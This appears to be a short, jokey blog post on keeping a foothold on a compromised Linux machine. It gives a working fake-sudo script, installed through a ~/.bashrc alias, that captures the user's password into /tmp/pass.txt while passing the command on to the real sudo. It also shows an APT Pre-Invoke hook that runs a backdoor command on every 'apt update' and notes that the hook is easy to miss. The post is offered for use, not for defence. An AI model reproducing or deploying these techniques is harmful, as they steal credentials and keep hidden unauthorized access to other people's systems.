A couple of persistence methods on Linux, This time we're picking on APT and bashrc :)
First let's play with bashrc. It's in the users home directory, and is called .bashrc.
First we add this to Bashrc.
# Make the file fakesudo and chmod it
$ chmod u+x ~/.hidden/fakesudo
#add to bashrc
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
Now we write the fakesudo script
read -sp "[sudo] password for $USER: " sudopass
echo ""
sleep 2
echo "Sorry, try again."
echo $sudopass >> /tmp/pass.txt
/usr/bin/sudo $@
A candy snowman for the reader who can figure out what happens here ;)
Now, on to something else. Let's play with APT for a while. In /etc/apt/apt.conf.d make a file called 00aptconf, and throw this line in it
APT::Update::Pre-Invoke {"very long command goes here..."};Now, everytime someone runs apt update, it will trigger the command / or script in the line, so or could be a second backdoor to leave behind, if the primary gets removed :)
Of course it's pretty easy to find, IF someone were to read through all their APT config files, do you do that very often ?
Have fun ;)